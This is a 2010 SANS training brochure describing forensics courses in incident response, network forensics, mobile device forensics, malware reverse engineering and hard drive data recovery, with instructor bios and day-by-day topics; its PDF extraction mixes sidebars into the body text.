Rob coauthored Know Your Enemy, 408.6 Hands On: Forensic Challenge and Mock Trial*
2nd Edition. He earned his MBA from Windows Vista/7 Based Digital Forensic Challenge. There has been a murder-
Georgetown University in Washington suicide and you are the investigator assigned to process the hard drive. This
DC. Rob was awarded the Digital day is a capstone for every artifact discussed in the class. You will use this
Forensic Examiner of the Year from the day to solidly your skills that you have learned over the past week.
Forensic 4Cast 2009 Awards. He blogs Topics: Digital Forensic Case; Mock Trial
Register at
about computer forensic and incident www.sans.org/
response topics at the SANS Computer network-security-2010
Forensic Blog. http://blogs.sans.org/
computer-forensic *This course is available to Forensics 408 participants only. SANS Network Security 2010
September 19 - 29, 2010 27
FORENSICS
508
• Incident response team 36 CPE Credits • Laptop Required • Instructors: Mike Murr; Richard Salgado (Day 5)
members that respond to
complex security incidents/intrusions and need
computer forensics to help solve their cases Data breaches and advanced intrusions are
• Computer forensic professionals who want to so- occurring daily.
lidify and expand their understanding of file system
Sensitive data and intellectual property is stolen from systems that
forensics and incident response related topics
are protected by sophisticated network and host-based security. A
• Law enforcement officers, federal agents, or motivated criminal group or nation state can and will always find a way
detectives who want to master computer forensics
inside enterprise networks. In the commercial and government sectors,
and expand their investigative skill set to include
data breach investigations and intrusion cases hundreds of victims responded to serious intrusions costing millions of
dollars and loss of untold terabytes of data. Cyber attacks originating
• Information security professionals with some
from China dubbed the Advanced Persistent Threat have proved difficult
background in hacker exploits, penetration testing,
and incident response to suppress. FOR508 will help you respond to and investigate these
incidents.
• Information security managers who would like to
master digital forensics to understand information This course will give you a firm understanding of advanced incident
security implications and potential litigation or response and computer forensics tools and techniques to investigate
manage investigative teams data breach intrusions, tech-savvy rogue employees, advanced persistent
threats, and complex digital forensic cases.
Utilizing advances in spear phishing, Web application attacks, and persis-
tent malware, these new sophisticated attackers advance rapidly through
your network. Incident responders and digital forensic investigators
must master a variety of operating systems, investigation techniques,
incident response tactics, and even legal issues in order to solve challeng-
ing intrusion cases. FOR508 will teach you critical forensic analysis tech-
niques and tools in a hands-on setting for both Windows- and Linux-based
investigations.
AUTHOR STATEMENT Attackers will use anti-forensic techniques to hide their tracks. They use
“There are people smarter than you, they have more resources rootkits, file wiping, timestamp adjustments, privacy cleaners, and complex
than you, and they are coming for you. Good luck with that.” malware to hide in plain sight, avoiding detection by standard host-based
Matt Olney said when describing the Advanced Persistent security measures. Everything will leave a trace; you merely need to know
Threat. He was not joking. The results over the past several where to look.
years clearly indicate that hackers employed by nation states
and organized crime are racking up success after success. The Learning more than just how to use a forensic tool, by taking this course
Advanced Persistent Threat has compromised hundreds of you will be able to demonstrate how the tool functions at a low level. You
organizations. Organized crime utilizing botnets are exploiting will become skilled with new tools, such as the Sleuthkit, Foremost, and the
ACH fraud daily. Similar groups are penetrating banks and mer- HELIX3 Pro Forensics Live CD. SANS’ hands-on technical course arms you
chants stealing credit card data daily. Fortune 500 companies with a deep understanding of the forensic methodology, tools, and tech-
are beginning to detail data breaches and hacks in their annual niques to solve advanced computer forensics cases.
stockholders reports. The enemy is getting better, bolder, and
their success rate is impressive. We can stop them. We need to FIGHT CRIME. UNRAVEL INCIDENTS... ONE BYTE AT A TIME.
field more sophisticated incident responders and digital forensic
investigators. We need lethal digital forensic experts that can
detect and eradicate advanced threats immediately. A properly
trained incident responder could be the only defense your orga- Prerequisites:
nization has left in place during a compromise. FOR508 is crucial It is highly recommend-
training for you to become a lethal forensicator to step up to ed that each student
these advanced threats. The enemy is good. We are better. This attend FOR408 prior to
course will help you become one of the best. - Rob Lee taking this course or
have equivalent digital
forensic experience in
28 SANS Network Security 2010 the field. GIAC Certification Cyber Guardian Program
September 19 - 29, 2010 www.giac.org www.sans.org/cyber-guardian
Computer Forensic Investigations and Incident Response is one of SANS’ most advanced and
challenging courses. People with GCIA and GCFA certifications often land some of the most challenging
jobs in information security. They have solved crimes that have appeared on the evening news.
508.1 Hands On: Forensic and Investigative Essentials*

Beginning the first day, you will learn the proper methodology of investigating a complex and advanced
digital crimes and intrusions. Utilizing real-world intrusion scenarios, you will see how to respond to complex
attacks through teaching you the background of how data is stored on a variety of operating systems.
This knowledge will allow you to see beyond most anti-forensic techniques allowing you to gain the
advantage while responding to breaches in your organization.
Topics: Computer Forensics for Incident Responders; Incident Response and Forensics; File System Essentials; Linux/
Unix File System Fundamentals; Windows FAT and exFAT File System Fundamentals; Windows NTFS File System
Fundamentals
508.2 Hands On: Live Response and Complex Evidence Acquisition*

Computer Forensic Investigators should be conversant with network and file system forensics in addition to being
Certified Instructor armed with the latest in incident response tools and methodologies. Day two, you will learn how to respond to
Mike Murr complex situations to collect crucial evidence using: Memory Acquisition, Live Response Techniques, and Complex
Evidence Acquisition.
Michael has been a
Topics: Key Forensic Acquisition/Analysis Concepts; Volatile Evidence Gathering and Analysis; Unix and Windows Live Response;
forensic analyst with Windows Incident Response Methodology; Evidence Integrity; Complex Forensic Evidence Acquisition and Imaging
Code-X Technologies 508.3 Hands On – Part 1: File System Forensic Analysis*
for over five years, has Investigating intrusion cases are challenging even for the seasoned investigator. Hackers will try to evade
conducted numerous detection and utilize wiping and other anti-forensic techniques to avoid leaving a trail on the host and network.
investigations and In order to investigate intrusion cases, you have to have a firm grasp of low-level forensic capabilities in both
commercial and open-source tools. Understanding of the various layers of the file system will allow you to move
computer forensic
beyond being an average investigator into one that could recover data “by hand” if necessary. To accomplish this,
examinations, and has we cover the Sleuthkit in the course.
performed specialized Topics: Filesystem Timeline Analysis; File System and Data Layer Examination, Metadata Layer Examination; File Name Layer
Examination; File Sorting and Hash Comparisons; Automated GUI Based Forensic Toolkits
research and develop-
ment. Michael has taught 508.4 Hands On – Part 2: File System Forensic Analysis*
SANS Security 504 (Hacker Utilizing advances in spear phishing, web application attacks, and persistent malware these new sophisticated
attackers advance rapidly through your network. Forensic investigators must master a variety of operating
Techniques, Exploits, and
systems, investigation techniques, and incident response tactics to solve challenging cases. Recovering data that
Incident Handling), SANS was skillfully removed can still be accomplished once an investigator knows the right places to look. This day of
Security 508 (Computer the course introduces the investigator to some of the most cutting edge areas of computer forensics discovered
Forensics, Investigation, over the past year. Shadow Volume/Restore Point Examinations, Super Timeline Analysis, and Advanced Registry
Examinations are all covered during the day.
and Response), and SANS
Topics: Key Windows File System Analysis Concepts; Intermediate/Advanced Windows Registry Analysis; Windows XP Restore
Security 601 (Reverse-Engi- Point Analysis; VISTA , Windows 7, Server 2008 Shadow Volume Copy Analysis; Super Timeline Analysis; Recovery Key
Windows Files; Finding Unknown Malware; Step-By-Step Methodology to Analyze and Solve Challenging Cases
neering Malware); has led
SANS@Home courses; and 508.5 Hands On: Computer Investigative Law for Forensic Analysts*
is a member of the GIAC Legal issues, especially liability, remain foremost in the minds of an incident handler or forensic investigator;
therefore, this class has more discussion than any other we offer. Learn to investigate incidents while minimizing
Advisory Board. Currently,
the risk for legal trouble. This course is designed not for management, but for the individuals actually performing
Michael is working on an a computer-based investigation. The content focuses on challenges that every investigator needs to understand
open-source framework before, during, and post investigation. Since most investigations could potentially bring a case to either a criminal
for developing digital or civil courtroom, it is essential for you to understand how to perform a computer-based investigation legally
and ethically.
forensics applications.
Topics: Who Can Investigate and Investigative Process Laws; Evidence Acquisition/Analysis/Preservation Laws and Guidelines;
Michael holds the GCIH, U.S. Laws Investigators Should Know; E.U. Laws Investigators Should Know; Presenting Data; Forensic Reports and
Testimony
GCFA, and GREM certifica-
tions and has a degree in 508.6 Hands On: Advanced Forensics & the Forensic Challenge*
computer science from Learn how to discover new artifacts using application forensics. Put your new skills to test during
California State University the end of week capstone investigation called the Forensic Challenge.
Topics: Application Footprinting and Software Forensics; • The Forensic Challenge
at Channel Islands. Michael Register at
also blogs about Digital Free SANS Investigative Forensic Toolkit (SIFT) www.sans.org/
forensics on his Forensic See page 26 for contents. network-security-2010
Computing blog.
www.forensicblog.org *This course is available to Forensics 508 participants only.
September 19 - 29, 2010 29
FORENSICS
558 Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 5:00pm
30 CPE Credits • Instructor: Jonathan Ham
Who Should Attend
Laptop not required – each student will receive a FREE 10” mini laptop loaded
• Network and/or computer
with Network Forensics tools that you can take home.
forensic examiners
• Computer incident response Want to analyze DNS tunnel traffic?
team members
Carve cached Web pages out of central
• Security architects
Squid proxies? Extract JPGs and GIFs from
• Security administrators
Snort packet captures for forensic investigations?
• Law enforcement
Network equipment, such as Web proxies, firewalls, IDS, routers, and
• Anyone responsible for orchestrating a even switches, contain evidence that can make or break a case. In
corporate or government network for
FOR558 you’ll learn how to recover evidence from network-based
evidence acquisition in the face of a
criminal or civil investigation devices and use it to build your case.
The first day we dive right into DNS tunnel The SNIFT Kit consists of:
analysis, DHCP log examination, and sniffing • Lenovo IdeaPad S10 –
10” Mini Laptop!
traffic. By day two, you’ll be extracting tun- • SANS VMware-based Forensic
neled flow data from DNS NULL records and Analysis Network, complete
extracting evidence from firewall logs. On with:
- Squid Web Proxy
day three, we analyze Snort captures and the - Firewall
Web proxy cache. You’ll carve out cached Web - Snort IDS
- Web Servers
pages and images from the Squid Web proxy. - DNS server
For the last two days, you’ll be part of a live - DHCP server
- … and more!
hands-on investigation. Working in teams, you’ll
• SANS Network Forensic
use network forensics to solve a crime and present Workstation, installed with:
your case. - Packet Tools (tcpdump,
AUTHOR STATEMENT
Wireshark, ngrep, tcpxtract
Computer forensics has traditionally focused on During hands-on exercises, we will use tools, such and others)
file recovery and filesystem analysis performed as tcpdump, Snort, ngrep, tcpxtract, and Wireshark, - Log Analysis Tools (Splunk,
against system internals or seized storage devices. squidview, and more)
to understand attacks and trace suspect activity. - Custom-written tools
However, the hard drive is only half the story.
Each student will be given a virtual network to from the Network Forensics
These days evidence almost always traverses the
community (pcapcat, oftcat,
network and sometimes is never stored on a hard analyze and will have the opportunity to conduct
&more)
drive at all. Network forensics can reveal who forensic analysis on a variety of devices. • Course Netbook loaded with
communicated with whom, when, how, and how Underlying all of our forensic procedures is a solid case examples!
often. It can uncover the low-level addresses of
the systems communicating, which investigators
forensic methodology. This course complements
can use to trace an action or conversation back to FOR408: Computer Forensic Essentials, using the same fundamental method-
a physical device. The entire contents of e-mails, ology to recover and analyze evidence from network-based devices.
IM conversations, Web surfing activities, and file A hard drive is just a small part of the picture. Even if an attacker is smart
transfers can be recovered and reconstructed
enough to clean up tracks on the victim system, remnants remain in firewall
to reveal the original transaction. More impor-
tantly, the protocol data that surrounded each logs, Web proxy caches, and other sources. FOR558: Network Forensics
conversation is often extremely valuable to the teaches students how to follow the attacker’s footprints and analyze
investigator, and this data can only be acquired evidence throughout the network environment.
from network-based devices. The payload inside As a part of this course you will receive a SANS Network Investigative Forensics Toolkit (SNIFT).
the packet at the highest layer may end up on disc, With your SNIFT Kit, you will gain first-hand experience in collecting and analyzing evidence
but the envelope that got it there is only captured
recovered from a network under investigation—and you can take it home with you!
in the network traffic. Network forensics can
reveal evidence that is crucial to building a case. PREREQUISITE: Students should have some familiarity with basic networking fundamentals, such as
-Jonathan Ham the OSI model and basics of TCP/IP. Please ensure that you can pass the SANS TCP/IP & Hex Knowledge
quiz. Students should also have basic familiarity with Linux or willingness to learn in a Linux-based
September 19 - 29, 2010 environment.
“This course is amazing. Not only are we covering an extensive
range of topics, we are doing lab work for each topic so that we
can be comfortable with the new material. Love the class!”
-DEBORAH GOSHORN, NAVAL POSTGRADUATE SCHOOL
558.1 Hands On: Passive Evidence Acquisition and Analysis*

On the first morning, we’ll investigate a rogue system administrator. His colleagues suspect he may
be abusing his privileges. There doesn’t seem to be any Web surfing activity at all associated with his
computers. What could he be up to? To solve the case, we embark together on an extensive analysis of
DHCP logs, wireless traffic captures, tcpdump using BPF filters, Wireshark, and the DNS protocol. Along
the way, we’ll learn about DNS tunneling using iodine, methods of passive evidence acquisition, network
taps, hubs, switches, and port mirroring. We’ll also use tools, such as ngrep, tcpxtract, and hex editors,
to extract the data we need. Underlying all of our forensic procedures is a solid forensic methodology,
which includes verification, acquisition, timeline creation, evidence recovery, and reconstruction.
Topics: Case Study: Data Tunneling; The OSI Model for Network Analysis; DHCP & MAC Address Analysis; Passive Evidence
Acquisition; Network Evidence Extraction & Analysis
Certified Instructor 558.2 Hands On: Active Evidence Acquisition and Covert Tunnels*
Jonathan Ham We’ll begin with covert ICMP and DNS tunnels. You’ll extract tunneled TCP and IP packets from DNS
Jonathan is an independent NULL records and use active evidence collection methods to uncover the rogue system administrator’s
consultant who specializes in secret plot! By the afternoon we’ll conduct hands-on active evidence acquisition. You’ll inspect router
large-scale enterprise secu- ARP tables and firewall logs. Volatility and collection methods vary depending on configuration,
manufacturer, and the environment. We’ll also cover ways that investigators can compensate for less-
rity issues, from policy and than-ideal network environments, using publicly available forensic evidence acquisition tools.
procedure, through staffing Topics: Data Tunneling In-Depth; A Formal Network-Based Investigative Methodology; Active and Interactive Evidence
and training, to scalable Acquisition
prevention, detection, and
response technology and 558.3 Hands On: Firewalls, IDS, Proxies, and Data Reconstruction*
techniques. With a keen under- Active evidence acquisition is the focus of day three. We’ll analyze IDS/IPS, central logging servers, and
standing of ROI and TCO (and Web proxies such as Squid, during hands-on exercises throughout the day. By the end of day three,
students will be using hex editors to carve cached evidence out of Web proxies and reconstruct Web
an emphasis on process over
surfing histories using only the central Web proxy logs.
products), he has helped his
Topics: Network Log Analysis In-Depth; Network Intrusion Detection & Analysis with Snort; Web Proxies, Encryption, & SSL
clients achieve greater success Interception
for over 12 years, advising in
both the public and private 558.4 Hands On: Network Forensics Unplugged*
sectors, from small upstarts At the beginning of the day, we will discuss wireless access point investigations and then learn about
to the Fortune 500. He’s been techniques for presenting digital evidence in court. After lunch we will begin our Capstone Case
commissioned to teach NCIS Study in which students will work as investigative teams, presented with a realistic scenario and a
virtual network. You will identify sources of evidence, collect the evidence, reconstruct content, solve
investigators how to use Snort,
the crime, and present your analysis in “court.”
performed packet analysis
Topics: Wireless Access Point Investigations; Digital Evidence Court Primer; Capstone Case Study: Investigate a Crime and
from a facility more than 2,000 Present the Evidence
feet underground, and char-
tered and trained the CIRT for 558.5 Hands On: Capstone Investigation*
one of the largest U.S. civilian Working in investigative teams, students will use forensic analysis tools to build a coherent picture
federal agencies. He currently of the crime. We will investigate by carving files out of raw network traffic and extracting sensitive
holds the CISSP, GSEC, GCIA, data hidden in ICMP payloads. We will trace the attack to its source by correlating activity with
firewall logs, central server logs, IDS logs, and other network-based evidence. Finally, we will
and GCIH certifications and is a
identify one of our suspects by reconstructing cached Web content, analyzing DHCP logs,
member of the GIAC Advisory and implementing passive OS fingerprinting techniques. After using this evidence
Board. A former combat medic, to build a solid case, we will develop a cohesive picture of the crime and discuss
Jonathan still spends some of techniques for presenting supporting evidence in deposition.
his time practicing a different Topics: Capstone Case Study: Investigate a Crime and Present the Evidence, cont.; Trace the Register at
Attack to its Source by Correlating: Firewall Logs, Central OS Logs, IDS Logs, and
kind of emergency response, more; Reconstruct Web Histories and Cached Web Content; Analyze DHCP Logs; www.sans.org/
volunteering and teaching for Fingerprint a Suspect’s Computer; Identify the Suspect using Network-based network-security-2010
Evidence; Build a Case and Discuss Techniques for Presenting in Court
both the National Ski Patrol
and the American Red Cross. *This course is available to Forensics 558 participants only.
September 19 - 29, 2010 31
FORENSICS
563
• Information security 30 CPE Credits • Laptop Required • Instructor: SANS Staff
professionals responsible for
investigating misuse of mobile
devices by employees and for Mobile device forensics is a rapidly evolving field,
responding to attacks against and creating exciting opportunities for practitioners in
theft of mobile devices
• Forensic investigators who want to pro-
corporate, criminal, and military settings.
cess mobile devices in a forensically sound Written for students who are both new to and already familiar with
manner and use the resulting evidence in mobile device forensics, this hands-on course provides the core
their work
knowledge and skills that a digital forensic investigator needs to process
• IT managers who need to understand the
relevance of mobile devices in security cell phones, PDAs, and other mobile devices. Using state-of-the art
breaches, policy violations, criminal tools, you will learn how to forensically preserve, acquire, and examine
activities, civil suits, and any resulting data stored on mobile devices and utilize the results for internal
proceedings
investigations or in civil/criminal litigation.
• IT auditors who need tools and techniques
for investigating mobile devices to ensure With the increasing prevalence of mobile devices, digital forensic
they are not being misused in a way that investigators are encountering them in a wide variety of cases.
puts an organization at risk Investigators within organizations can find stolen data and incriminating
• Law enforcement agents who need to communications on devices used by rogue employees. In civil and
extract information from mobile devices in
criminal cases, investigators can extract useful evidence from mobile
a wide variety of crimes
devices, can get a clearer sense of which individuals were in cahoots,
• Attorneys who need an understanding of
the types of evidence that can be extracted and can even show the location of key suspects at times of interest.
from mobile devices, the forensic process, IT auditors, managers, and lawyers all need to understand the vast
legal issues (e.g., privacy, authentication, potential of mobile device forensics.
integrity), and how the findings can be
used to build/strengthen a case By guiding you through progressively more intensive exercises with
mobile devices, we familiarize you with the inner workings of these
devices and show you the benefits and limitations of various approaches
and tools. The combination of teaching skills and knowledge will enable
you to resolve investigations. The capstone exercise at the end of this
course is designed to hone your mobile device forensics skills and help
you apply them to an actual investigation.
Laptops are required for this course. A variety of devices will be available
for you to work with during the course. You are also encouraged to
bring used mobile devices and SIM cards from home to experiment with
using the tools and techniques in this course, but this is not required.
AUTHOR STATEMENT
Mobile devices are becoming ubiquitous, delivering powerful technology into our pockets, keeping
us connected wherever we are, and creating new security risks while providing valuable sources of
evidence. Individuals store personal data on their PDAs, parents use GPS enabled devices to track their
children, hospitals use handhelds to access medical data and support patient care, and companies give
each employee a Blackberry to support their business. Corporate spies and data thieves have been
caught using their mobile devices. Organized criminal groups have been infiltrated and unraveled
through their use of mobile devices. A killer’s mobile device showed his whereabouts at the time of the
crime and inadvertently recorded the sounds of his brutal acts. Sex offenders have videotaped their
crimes using mobile devices. Many vice officers and courts consider mobile devices an integral part of
drug trafficking and dealing. Using the proper methodology and tools, you can extract useful evidence
from mobile devices and obtain records from network service providers to help avert an attack, further
September 19 - 29, 2010 an investigation, or solve a crime. -Eoghan Casey
“This course was an informative,
hands-on, and concise class that changed
the way I look at security tools.”
-RICHARD SALMON, LOUISIANA STATE EMPLOYEE RETIREMENT SYSTEM
563.1 Hands On: Fundamentals of Mobile Device Forensics*

This first day covers a review of technology from a forensic perspective, forensic handling of mobile devices, and manual
examination of mobile devices. In delving into the underlying technology of mobile devices and wireless networks, we show you
how the data they contain can be used as evidence. We will cover the core forensic methodology as it relates to mobile devices
when conducting a manual triage inspection, logical forensic examination, and in-depth forensic analysis of physical memory. We
show you how to interpret and utilize various identifiers and numbers associated with mobile devices, including MEID, IMEI, ICC-
ID, and IMSI. Hands-on exercises include how to process mobile devices from a forensic perspective and obtain information that
forensic tools may not provide.
Topics: Mobile Network Investigations; Mobile Device Forensics; Forensic Handling of Mobile Devices; Forensic Documentation; Interacting with Mobile Devices; Hands-
on Exercises
563.2 Hands On: Windows Mobile Forensics*

On this day we’ll go through a hands-on exploration of mobile device operating systems and data storage using manufacturer and
developer utilities. We will perform forensic acquisitions and examinations of SIM cards to better understand how they store data,
how to decode the data, the types of information they contain, and how that information can be useful in an investigation. You will
use manufacturer and developer tools to gain a deeper understanding of mobile device internals.
Topics: Accessing Mobile Devices; Mobile Device Operating Systems; Mobile Device File Systems; Forensic Processing of SIM Cards; Forensic Examination of Data; Hands-
on Exercises
563.3 Hands On: Cell Phone Forensics*

We will use forensic tools to acquire and analyze logical data from mobile devices and then compare forensic acquisition tools
and validate completeness and accuracy of results. No one tool can accomplish everything, and you need to be able to select the
right tool for the job at hand. As day three progresses, we dig deeper into digital evidence on mobile devices, analyzing call logs,
SMS/MMS, photos, and associated metadata. In addition, we demonstrate how to utilize e-mail, Web browsing, and other Internet
activities on mobile devices in an investigation.
Topics: Forensic Acquisition Tools for Mobile Devices; Forensic Examination of Logical Data; Forensic Analysis of Internet Activities on Mobile Devices; Forensic
Reconstruction of Activities on Mobile Devices;
Hands-on Exercises
563.4 Hands On: Blackberry, Nokia, and iPhone*

Acquiring full memory contents is one of the more challenging aspects of mobile device forensics and may not be feasible in all
cases. We’ll use forensic tools to acquire and analyze physical memory from mobile devices and then delve into memory contents
and extract data structures on mobile devices. You’ll learn how to confirm key findings by examining them in their original context
in hexadecimal form. We demonstrate the various mechanisms for acquiring memory, including Flasher boxes, and assess their
strengths and limitations from a forensic perspective. We will step you through the process of acquiring the full contents of physical
memory from a mobile device.
Topics: Forensic Acquisition of Physical Memory; Forensic Acquisition of Using Flasher Boxes; Forensic Examination of Physical Memory; Hands-on Exercises
563.5 Hands On: Advanced Forensics and the Forensic Challenge*

This last day familiarizes you with more complicated and costly forensic acquisition and analysis techniques. For instance, using
specialized equipment for accessing circuit boards of mobile devices, it is possible to access data in memory directly. A
realistic hands-on investigative scenario brings together lessons and techniques learned throughout the course. Even
the most ingenious technical analysis becomes worthless, however, if it is not clearly presented to decision makers --
a manager, lawyer, or jury. We spend the final part of the course discussing effective approaches for presenting
your findings to a non-technical audience. Register at
Topics: Advanced Mobile Device Forensics Overview; Bringing It All Together; The Mobile Device Forensic Challenge; Hands-on www.sans.org/
Exercise
network-security-2010
*This course is available to Forensics 563 participants only. SANS Network Security 2010
September 19 - 29, 2010 33
FORENSICS
610
• Anyone whose job requires an 30 CPE Credits • Laptop Required • Instructor: Lenny Zeltser
understanding of key aspects
of malicious programs
Expand your capacity to fight malicious code by
• Individuals with responsibilities in
incident handling, forensic analysis, learning how to analyze bots, worms, and trojans.
Windows security, and system This popular five-day course discusses practical approaches to
administration examining Windows malware using a variety of monitoring utilities, a
• Individuals responsible for supporting disassembler, a debugger, and other tools useful for reverse-engineering
their organization’s internal security malicious software. You don’t have to be a full-time malware searcher to
needs
benefit from this course—as organizations increasingly rely on their staff
• Engineers from security product and to act as first responders during a security incident, malware analysis
service companies who are looking
skills become increasingly important.
to deepen their malware analysis
expertise By covering both behavioral and code analysis approaches, this unique
course provides a rounded approach to reverse-engineering. As a result,
the course makes malware analysis accessible even to individuals with
a limited exposure to programming concepts. The materials do not
assume that the students are familiar with reverse-engineering; however,
the difficulty level of concepts and techniques increases quickly as the
course progresses.
In the first half of the course, you will learn how to set up an inexpensive
and flexible laboratory for understanding inner-workings of malware
and demonstrate the process by exploring capabilities of real-world
specimens. You will learn to examine the program’s behavioral patterns
and assembly code and study techniques for bypassing common code
obfuscation mechanisms. The course also explores how to analyze
browser-based malware.
In the second half of the course, you will review key assembly language
concepts. You will learn to examine malicious code to understand its flow
by identifying key logic structures, looking at examples of bots, rootkits,
key loggers, and so on. You will understand how to work with PE headers
Prerequisites: and handle DLL interactions. You will also develop skills for analyzing self-
• Students should have a computer defending malware through advanced unpacking techniques and bypassing
system that matches the stated code-protection mechanisms. Finally, you will discover how to bypass
laptop requirements. Some obfuscation techniques employed by browser-based malicious scripts.
software needs to be installed
Hands-on workshop exercises are an essential aspect of this course and allow
before you come to class.
you to apply reverse-engineering techniques by examining malicious code
• Students should be familiar
in a carefully controlled environment. When performing the analysis, you will
with using Windows and Linux
operating environments and study the supplied specimen’s behavioral patterns,
be able to troubleshoot general and examine key portions of its assembly code.
connectivity and setup issues. REM course on YouTube
http://www.youtube.com/watch?v=5AFdZ0v23YA
34 SANS Network Security 2010 GIAC Certification

September 19 - 29, 2010 www.giac.org
610.1 Hands On: Malware Analysis Fundamentals*
Day one lays the groundwork for the course by presenting the key tools and techniques
malware analysts use to examine malicious programs. You will learn how to save time by
exploring malware in two phases. Behavioral analysis focuses on the specimen’s interactions
with its environment, such as the registry, the network, and the file system; code analysis
focuses on the specimen’s code and makes use of a disassembler and a debugger. You will
learn how to build a flexible laboratory to perform such analysis in a controlled manner
and will set up such a lab on your laptop. Also, we will jointly analyze a malware sample to
reinforce the concepts and tools discussed throughout the day.
610.2 Hands On: Additional Malware Analysis Approaches*

Day two builds upon the fundamentals introduced earlier in the course, and discusses
techniques for uncovering additional aspects of the malicious program’s functionality. You
will learn about packers and the analysis approaches that may help bypass their defenses.
You will also learn how to patch malicious executables to change their functionality during
the analysis without recompiling them. You will also understand how to redirect network
traffic in the lab to better interact with malware, such as bots and worms, to understand their
capabilities. You will also experiment with the essential tools and techniques for analyzing
Web-based malware, such as malicious browser scripts and Flash programs.
Senior Instructor
Lenny Zeltser 610.3 Hands On: Malicious Code Analysis*
Day three focuses on examining malicious executables at the assembly level. You will
Lenny Zeltser leads the security
discover approaches for studying inner-workings of a specimen by looking at it through a
consulting practice at Savvis. He disassembler and, at times, with the help of a debugger. The day begins with an overview
is also a member of the board of of key code reversing concepts and presents a primer on essential x86 assembly concepts,
directors at the SANS Technology such as instructions, function calls, variables, and jumps. You will also learn how to examine
common assembly constructs, such as functions, loops, and conditional statements. The
Institute, a SANS faculty member,
second half of the day discusses how malware implements common characteristics, such as
and an incident handler at the keylogging, packet spoofing, and DLL injection, at the assembly level. You will learn how to
Internet Storm Center. Lenny recognize such characteristics in malware samples.
frequently speaks on information
security and related business
610.4 Hands On: Self-Defending Malware*
Day four begins by covering several techniques malware authors commonly employ to
topics at conferences and
protect malicious software from being analyzed, often with the help of packers. You will
private events, writes articles, learn how to bypass analysis defenses, such as structured error handling for execution flow,
and has co-authored several PE header corruption, fake memory breakpoints, tool detection, integrity checks, and timing
books. Lenny is one of the few controls. It’s a lot of fun! As with the other topics covered throughout the course, you will be
able to experiment with such techniques during hands-on exercises. The course completes
individuals in the world who
by revising the topic of Web-based malware, showing additional tools and approaches for
has earned the highly-regarded analyzing more complex malicious scripts written in VBScript and JavaScript.
GIAC Security Expert (GSE)
designation. He also holds the 610.5 Hands On: Deeper Malware Analysis*
CISSP certification. Lenny has an Day five represents the latest addition to the FOR610 course, discussing the more recent
malware reverse-engineering approaches adopted by malware analysts. The topics
MBA degree from MIT Sloan and
covered during this day include analyzing malicious Microsoft Office and Adobe PDF
a computer science degree from document files. Exercises that demonstrate these techniques make use of tools, such
the University of Pennsylvania. as OfficeMalScanner, Offvis, PDF-parser, and PDF StructAzer. Another major topic
For more information about his covered during this day is the reversing of malicious Win32 executables using
memory forensics techniques. This topic is explored with the help of tools,
projects, see www.zeltser.com.
such as Volatility, malfind, moddump, and others, and brings us deeper into
the world of user- and kernel-mode rootkits.
Attention REM Course Alumni: Day five was very recently added to this course. If you’ve already Register at
attended the four-day version of the course (SEC610), you can take the whole five-day class now www.sans.org/
at a 50% discount or take just day five at one-fifth the full course price. This promotion is only network-security-2010
valid in 2010. Please contact tuition@sans.org for details.
*This course is available to Forensics 610 participants only.
September 19 - 29, 2010 35
HOSTED
COURSE
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010
Who Should Attend 9:00am - 7:00pm (Days 1-4) • 9:00am - 3:30pm (Day 5)
• Anyone who has ever tried to im- 39 CPE Credits • Laptop Required • Instructor: Scott Moulton
age a hard drive with bad blocks
only to have it fail and never be able
to get a good image of the drive The data recovery world and the forensics
• Corporate personnel who handle large world are very close in relation.
amounts of data and hard drives This course discusses topics valuable to both forensic and data
• System administrators and incident recovery professionals alike and touches on data recovery topics
handling personnel who want to relating to forensics.
understand how a hard drive actually works
and are interested in reassembling one
Our primary goal is clear: Evening Bootcamp
from the ground up To produce valid disk images and Sessions
recover the data from marginally Evening hands-on session that
• Anyone who wants to learn how to do data
allows students to utilize the
recovery on a damaged hard drive and to operative or defective media for use in knowledge gained throughout
collect best evidence data recovery or forensics. the course in an instructor-led
• Anyone who wants to learn how file The processes and methodologies environment.
systems are structured and how data is taught in this course will train you to 5:00pm - 7:00pm (Days 1-4)
stored so that they can understand where
collect an image on damaged evidence
evidence exists on any type of hard drive
where standard forensic imaging would have failed. You will
understand what kinds of problems hard drives have and what your
options are to recover the contents. Specialized data recovery trade
secrets used in these processes specifically will be discussed so we
can acquire data from damaged disks. We will perform some exciting
labs in which you will format a hard drive, put data on the drive,
disassemble the drive down to the bare metal, and then “successfully”
reassemble the drive and recover your data from it.
This course will highlight the tools that work well with corrupted file
systems, both in demonstration and in the lab exercises, and students
will learn the basics of file systems and logical recoveries. There will be
AUTHOR STATEMENT information regarding FAT, NTFS, Mac OSX HFS+ hard drive formats, EXT3,
The world of data recovery is cloaked in secrecy. Data Reiser recoveries, and what to do when there is damage, with examples of
recovery is a very difficult skill to learn and involves
each in labs. Students will also perform logical recoveries where we will
repairing damaged hard drives and recovering cor-
rupt data. Many times it is difficult just to find out use software and specialized data recovery equipment to image memory
how a particular hard drive works. As a forensics or sticks, hard drives, and image files.
data recovery community, from time to time we all If you would like five bootcamp days of training and learning trade secrets
run into damaged hard drives that are difficult to of the data recovery profession, this is the course for you. It will consist of
create an image of. At one time or another, we have
all been in that position where the software hangs
lecture and labs with mentoring on disassembly and reassembly of the
and never completes – a difficult situation to be in hard drives. Usually by the second day, the majority of students are able
when you have lawyers or clients looking over your to rebuild a hard drive and recover data from it. However, this course is
shoulder. What do you do when you have that type about process and methodologies, teaching the techniques used in data
of an error and your drive cannot be copied? The goal recovery labs so that you can understand and build on those skills.
of this class is to teach you how to handle a damaged
hard drive and what your options are. We will intro-
duce you to the proper hardware, equipment, and Hosted by
software that will give you the best possibility and
skills at completing this task. -Scott Moulton

September 19 - 29, 2010
Hands On – Part 1: Drive and Data Recovery Forensics*
On day one we introduce you to the basic hardware equipment used by data recovery profes-
sionals. We will break down the four main phases of data recovery, disassemble two hard drives,
and then reassemble each piece and attempt to get the drive working again. We will close with a
display of how to match hard drives for donor drives. We will start with the anatomy of the drive
and begin to break down what each item is, what it is called, and its function. After discussing
newer methods of recording to the hard drive, you will disassemble two hard drives during the
lab and extract all the parts, and then reassemble each piece and attempt to get the drive work-
ing again. Over the next two days we will do a total of five drives in order to ensure your success.
Topics: Basic Hardware: Four Phases of Data Recovery: Anatomy of Hard Drives

We now move to the more logical functions controlled by the drive and the internals of initializa-
tion processes done by the drive at the power on cycle. We will cover the basic types of heads,
how the content is read, and the way data is stored. For this to happen, we will need to learn
